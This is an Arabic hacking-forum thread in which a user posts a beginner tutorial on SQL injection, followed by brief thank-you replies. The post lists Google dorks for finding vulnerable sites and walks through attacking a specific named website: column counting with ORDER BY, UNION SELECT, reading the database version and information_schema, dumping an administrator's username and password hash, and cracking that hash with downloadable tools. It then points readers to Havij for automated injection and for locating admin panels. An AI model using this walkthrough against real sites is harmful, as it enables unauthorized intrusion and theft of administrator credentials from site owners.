مبتدأ ولا تعرف شيئا هنا بدايتك ادخل وستخرج خبيرا
 

مرحبا بجميع الاخوة الكرام
lمقدمة الان نذهب للمهم اولا سوف نضع تعريفا لما يسمى بحقن قواعد البيانات والمصطلحات الاساسية فيه
: التعريف
أولا تعريف قاعدة البيانات
ساضرب لكم مثال لكي تفهمو ما معنى قاعدة بيانات لو طلب منك تخزين بيانات مجموعة من العاملين ستحتاج في بياناتهم الى اسمهم الاول مثلا واللقب ورقم الهاتف ثم العنوان والبريد الالكتروني هذه التي اعطيتك اياها تسمى حقول القاعدة والقاعدة ككل عنوانها سيكون بيانات العاملين اذا اصبح لدينا حقول فارغة ستبدا بتعبئتها لتصبح عندك قاعدة بيانات نشيطة ولو طلبت منك استخراج بيانات الموظف صاحب رقم الهاتف كذا ستلجا الى حقل الهاتف ثم تبحث عن الرقم المطلوب عندما تجده ستتجه الى خانة الاسم المقابل لهذا الرقم ليظهر لك صاحب الرقم

هذا هو الشرح العام لمعنى قاعدة بيانات

وكل منتدى أو موقع ايا كان هو عبارة عن اعضاء ومواضيع وردود بشكل عام هذه تعتبر هي جداول المنتدى بالاضافة الى غيرها من الجداول لذلك حتى يتم تخزين هذه الجداول يتطلب منا انشاء قاعدة لتحتوي على هذه الجداول وغيرها ويصبح لدينا منتدى


المسؤول عن قاعدة البيانات كل من يملك صلاحية الدخول الى لوحة تحكم الموقع ليضيف من هنالك قاعدة جديدة او يجري تعديلات على القاعدة
والجداول المذكورة سابقا من مواضيع وردود نحن لا تهمنا نحن من يهمنا الجداول التي تحتوي على اليوزر أي اسم الادمين يعني مدير الموقع والباسوورد يعني كلمة السر
وقواعد البيانات يقوم بتصميمها مبرمجون ولكن في بعض الاحيان هؤلاء المبرمجون يرتكبون أخطاء ومن هذه الاخطاء خطأ يسبب ثغرة الحقن ويتم استغلال ثغرة الحقن عن طريق توجيه اوامر واستعلامات الى القاعدة ببساطة اكثر يعني كتابة اوامر يعني اكواد وكلمات بعد المتغير لا تعرف ماهو المتغيير المتغير هو الرقم الذي يأتي في رابط
= الموقع المصاب بعد علامة
مثلا
www.xxxxxxxxxx.com/inscription.php?id=14
الرقم المكتوب بالاحمر هو المتغير
يعني لاختراق الموقع نقوم بكتابة أوامر معينة هي الاستعلامات بعد الرقم وهذه الاوامر سنتطرق اليها فيما بعد
وثانيا هناك مصطلح الدوركات وهي اكواد توضع في محركات البحث للبحث عن اهدافنا اي مواقع مصابة


تكلمنا في المقدمة عن حقن قواعد البيانات وتعريفها وبعض المصطلحات
الان سنبين كيفية البحث عن المواقع المصابة في صديقنا المقرب google
يتم ذلك بطريقتين
:1_____الطريقة الاولى ببساطة البحث في المنتديات مثلا بكتابة:
Sqlمواقع مصابة بثغرات
أو أي شيء اخر يكفي ان تشغل عقلك
2_____الطريقة الثانية:
هي بكتابة مايسمى بالدوركات وقد شرحنا معناها في مقدمة الدورة
واليكم بعض الدوركات
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurlgl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
يكفي ان تكتبوها في محرك البحث وتظهر المواقع المصابة ويمكنكم البحث عن دوركات اخرى في محرك البحث مثلا بكتابة دوركات للبحث عن المواقع المصابة بثغرة الحقن
الان بحثنا عن المواقع المصابة ولكن علينا ان نتأكد من انها مصابة ويتم ذلك بوضع هذه العلامة (') بعد المتغير ولقد تم شرح ما معنى المتغير في المقدمة


الان عرفنا كيف نبحث عن الموقع المصاب الان نعرف اول خطوة في حقن قواعد البيانات أولا نختار موقع لنجرب عليه عندي موقع مصاب
http://www.bananecoco.com/achat/index.php?id=17
لنتاكد من انه مصاب نضع علامة '
كما شرحنا فس السابق اي يصبح الرابط هكذا
http://www.bananecoco.com/achat/index.php?id=17'
تابع الصورة
http://img103.herosh.com/2011/06/20/645615959.png
كما ترون ظهر الخطأ هاذا يعني ان الموقع مصاب
الان عرفنا ان في الموقع ثغرة حقن والان علينا استغلالها
اول ما سنفعله هو معرفة عدد الاعمدة في قاعدة البيانات
ويتم ذلك بامر
في مكان النقاط نكتب رقم اولا نبدا بالرقم واحد اي يصبح الرابط هكذا
تابع الصورة
http://img102.herosh.com/2011/06/20/192306586.png

كما ترون لا يوجد هناك خطأ لتستوعبو الامر اننا نوجه اوامر للقاعدة لنسحب منها بيانات الادمن يعني لو كتبنا امرا خاطئا سيضهر لنا خطأ مثلما ضهر لنا في السابع يعني لو كتبنا عدد اعمدة اكثر من التي في القاعدة يظهر لنا خطء وبالتجريب نستطيع معرفة عدد الاعمدة مثلا نكتب order by 20—
يعني يصير الرابط هكذا
شوفو ماذا حدث
http://img102.herosh.com/2011/06/20/20602362.png
ظهر لنا الخطأ هاذا يعني ان عدد الاعمدة اقل من 20
الان ما ذا نفعل نستمر في انقاص الارقام
يعني نتابع تغيير الارقام تنازليا
يعني مثلا هكذا
ظهر لن الخطا
ثم
ايضا ظهر لنل الخطا نستمر بالانقاص حتى لايضهر لنا الخطا
نجرب ظهر لنا الخطأ
الان لم يظهر لنا الخطأ يعني القاعدة فيها 13 عمود
الان عرفنا عدد الاعمدة الان ناتي للخطوة التي بعدها قلنا في السابق ان الموقع مصاب والحقيقة هي ان بعض الاعمدة في القاعدة مصابة وليس كلها اذن علينا ان نعرف العود المصاب ولذلك نضيف هاذا الاستعلام الى الرابط
+union+select+الاعمدة الموجودة في الموقع--
يعني في حالتنا الاعمدة 13 يعني الامر يكون هكذا
+وهناك شيء اخر نضيف علامة – قبل المتغير يعني يصير الرابط هكذا
تابع الصورة
http://img105.herosh.com/2011/06/20/948839215.png
كما ترون في الصورة ظهرت ارقام 2و3و5
هذه الارقام هي الاعمدة المصابة في هاذا الموقع نحن نحتاج واحدا فقط انا اخترت العمود 3
نتابع
الان عرفنا عمودا مصابا الان يجب ان نعرف اصدار قاعدة البيانات اذا كان 4 او 5
ولذلك نكتب
version()
في مكان العمود المصاب يعني يصير الرابط هكذا
تابع الصورة
http://img104.herosh.com/2011/06/20/994864535.png
كما ترون مكتوب
5.0.44-log
يعني اصدار رقم 5
لوطلعلك رقم 5 تابع الخطوات الاتية ظهرلك ولورقم 4 توقف وانتضر ساشرح ذلك فيما بعد
المهم عرفنا اصدار القاعدة
الان نضيف امر في مكان المود المصاب
و
في اخر الرابط
يعني يصبح الرابط هكذاوتذكر اذا طلع لك خطء يعني ارتكبت خطا واذا لم يظهر أي خطا يعني ان استغلالك صحيح
وتذكر ايضا انه يمكن ان تضهر النتائج في أي مكان في الاعلى او الاسفل وفي أي مكان
الان نضيف هاذا الامر
هاذا الامر لمعرفة اسم اليوزر يعني يصبح الرابط هكذا
تابع الصورة
http://img105.herosh.com/2011/06/20/611291193.png


كما ترون ظهر لنا في اول النتائج
utilisateurs
users وليس دائما يكون هكذا ممكن تجده
او أي اسم اخر يعني على حسب لغة الموقع اذا كيف تعرفه سهلة لانه ياتي في الاول يعني الاول في النتائج
الان ناخذ الاسم الذي وجدناه ونتوجه لموقع
http://www.waraxe.us/sql-char-encoder.html

تابع الصورة

[url=http://www.herosh.com]http://img105.herosh.com/2011/06/20/532487988.png[/url
ناخذ الكود كما شاهدتم
كان الرابط هكذا

الذي مكتوب بالاحمر نحذفه ونحط بدله
+where+table_name=هنا الكود الذي اخذناه من الخطوة السابقة
يعني في حالتنا هكذا
يعني يصير الرابط هكذا
group_ ثم نضيف كلمة
قبل concat
في الرابط يعني يصير الرابط هكذا
تابع الصورة
http://img103.herosh.com/2011/06/20/415283474.png
كما ترون ناخذ

utilisateurs و nom_utilisateur وmot_passe
يعني نحن اخذنا اسم اليوزر واسم كلمة السر واسم اليوزرنايم
وليس في كل مرة تكون هكذا كما قلت لكم يعني حسب لغة الموقع
والان نرجع للرابط الاول

http://www.bananecoco.com/achat/inde...,group_concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=0 x7574696c6973617465757273--
نستبدل ماهو ملون بالاحمر باسم اليوزر يعني في حالتنا utilisateurs
وماهو بالاخضر بكلمة السر يعني في حالتنا
Mot_passe
وماهو بالازرق باليوزر نايم يعني في حالتنا
Nom_utilisateur
يعني يصبح الرابط هكذا
تابع الصورة
http://img104.herosh.com/2011/06/20/407237183.png

مبروك عليك وفي حالتنا هذه هناك في الموقع عدة مديرين نحن نكتفي بواحد

palmier نختار
كلمة مروره المشفرة
054066b810990de8

ولكن كلمة السر مشفرة وهاذا مايسمى بالهاش ولمعرفة كلمة السر علينا فك تشفير الهاش ولفكه يجب علينا اولا ان نعرف نوعه وذلك من خلال هذه الاداة
http://www.mediafire.com/?crm0zzi13j59lhn
حملها وافتحها في الاول تظهر لك صورة من الوجوه الضاحكة اضغط فيها وبعد الضغط تابع الصورة
http://img102.herosh.com/2011/06/20/405405759.png
كما ترون ظهر لنا نوعه وهو my sql
اذا ضهر لك هاذا النوع يمكنك فكه بهذه الاداة
تابع الشرح
الأداة اسمها

mysqlfast.exe

تمت ترجمتها لعيونكم و رفعهاعلى الميديا

http://www.mediafire.com/?rd92kul4iacbqxo

استعمال الأداة

ندخل على موجة الدوس :

start >>> run >>> cmd

و ندخل إلى مسار الأداة :

أنا حاطط الأداة في هذا المسار

C:\mysqlfast.exe

نكتب اسم الأداة :

mysqlfast.exe



نشرح طريقة استعمالها

أمر استعماله والتطبيق على الهاش
اكتب هاذا الامر في الدوس



mysqlfast.exe 054066b810990de8 x

وهذا الناتج


http://img105.herosh.com/2011/06/20/999402557.png

تم الفك مبروك
كلمة السر هي
chamax

هاذا ان كان من نوع my sql
ويمكن ان يكون من نوع md5
وفكه سهل اذهب على موقع
hashkiller.com
اولا سجل في الموقع ههههه لن اشرح ذلك بالصور لانني اضن ان الكل يعرف طريقة التسجيل
بعد التسجيل اذهب على webcrack
اكتب الهاش واضغط على webcrack
وستضهر لك كلمة السر في الاسفل
اما اذا كان من نوع اخر ابحث عن ادوات اخرى لفكه
المهم يا اخواني الان حصلنا على اليوزر نايم والباس

والان تذكرتم اني قلت لكم
اذا كان اصدار القاعدة 5 تابعو معي الان اذا وجدت اصدار القاعدة 4 هناك طرق لحقنه ولكني اخبرك دعك منها وحان وقت نوع اخر من الحقن وهو الحقن الاوتوماتيكي وافضل برناج هو برنامج هافيج لن اعمل له شرح لانه موجود في المنتدى الرابط
http://www.vbspiders.com/vb/t41063.html
ملاحظة البرنامج يحقن بجميع الانواع يعني ايضا الاصدار 5

وفي الاخير بما انك حصلت على كلمة السر الان يجب عليك ايجاد مسار لوحة التحكم وهاذا ايضا ببرنامج havij
وذلك ايضا مشروح في الرابط العلوي



في الاخير اقدم هاذا الموضوع لجميع الاعضاء الكرام وارجو التقييم تقديرا لتعبي

تم الشرح من neo-m

neo@vbspiders.com

thx man keep up

شكراااااااا ملاحظة

اخبرتكم اني لن اشرح برنامج هافيج ولكني غيرت رايي

هاذا هو الشرح

http://www.vbspiders.com/vb/t49615.html#post340662

تسلم على الشرح يا غالي

مشكورررر

يعطيك الف عافيه ما تقصر ,,,

شرح رائع مشكوووور

رد: مبتدأ ولا تعرف شيئا هنا بدايتك ادخل وستخرج خبيرا
 

شكرااا

رد: مبتدأ ولا تعرف شيئا هنا بدايتك ادخل وستخرج خبيرا
 

think you veryy moch men .. :)

رد: مبتدأ ولا تعرف شيئا هنا بدايتك ادخل وستخرج خبيرا
 

بارك الله فيك على الشرح الوافي

رد: مبتدأ ولا تعرف شيئا هنا بدايتك ادخل وستخرج خبيرا
 

يعطيك ألف عافية

رد: مبتدأ ولا تعرف شيئا هنا بدايتك ادخل وستخرج خبيرا
 

رد: مبتدأ ولا تعرف شيئا هنا بدايتك ادخل وستخرج خبيرا
 

يعطيك الف الف عافيه وبارك الله فيك وجزيت خيراً

رد: مبتدأ ولا تعرف شيئا هنا بدايتك ادخل وستخرج خبيرا
 

ايه الحلاوه دى ابداع فى الشر ح ارجو ان تستمر وياريت كمان يكون الشرح فديو اكون شاكر